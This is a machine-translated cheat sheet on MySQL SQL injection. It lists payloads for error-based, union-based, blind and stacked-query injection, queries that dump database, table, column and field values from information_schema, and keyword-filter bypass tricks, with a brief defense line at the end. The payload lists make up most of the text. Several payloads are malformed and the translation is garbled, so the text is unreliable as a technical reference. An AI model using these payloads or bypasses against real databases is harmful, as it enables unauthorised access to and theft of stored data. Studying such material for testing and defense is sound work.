MySQL injection basics and Bypass Tips summary

1, MySQL injection principle: The user input content is treated as a SQL statement to execute

2, MySQL injection combat experience: A test parameters, two test type, three test bypass

A test parameter: any injection parameter, it is necessary to determine the type (number or character), here refers to the type of injection parameters (* * *)

Commonly used test characters: quotation marks (single and double), parentheses, quotation marks and parentheses ...

Two test types: five major categories (Beust): Boolean blind, error injection, Union Joint query injection, time delay type blind, heap query injection

Boolean blind Note: and1=1, and 1=2, or 1=1, or 1=2 ...

Error type injection:

　Floor:and (select 1 from (SELECT COUNT (*), concat (Database (), Floor (rand (0)) × from Information_schema.tables Group by X A

Updatexml:and 1=updatexml (1,concat (0x7e, (select Database ())), 1)

Extractvalue:and 1=extractvalue (1,concat (0x7e, (select Database ()))

......

Union union query Type injection:

ORDER BY N//fixed field, n is a positive integer

Union SELECT ... Look back, try to get the statement before union (@@@&&****) without echoing

Back to digits, table, field, value, second bit back to digits example, common commands are as follows:

Union Select 1,group_concat (schema_name), 3 from Information_schema.schemata//Bomb Vault

Union SELECT 1,GROUP_CONCAT (TABLE_NAME), 3 from Information_schema.tables where table_schema=database ()//Explode table

Union Select 1,group_concat (column_name), 3 from information_schema.columns where table_name= ' table name '//Explode field

Union Select 1,group_concat (Field 1,0x3a, Field 2), 3 from table name//burst value, 0x3a is used to separate fields, so we can view

Time-Delayed injection: Based on page response delay, test parameters: and sleep (5)

Injection method (guess solution):

And if (Length (Database ()) > ' 5 ', sleep (5), 0)//guess the length of the library name

And if (Ord (Database (), >100,sleep)) (5), 0)//guess the first character of the library name

...... It's better to use sqlmap here.

Heap Query injection: execute multiple SQL statements at the same time, you can perform additions and deletions to change the statement, separate statements separated by semicolons

Three try to bypass: is to keep trying, simply say a few

Bypass space: +,/**/, double space, carriage return newline (%0a,%a0), wide byte (%DF), parentheses

Bypass Union,select and other keywords: case, double write (uniounionn,unionunion), inline comment (/*!union*/), encode

Bypass and, or:&&,| |,%26%26, case, double write keywords (anandd,andand), encoding

......　　　　

3, MySQL Injection defense method: Black and white list strictly filter user input content; use parameterized queries; Use SQL to inject security devices　　　

MySQL injection basics and Bypass Tips summary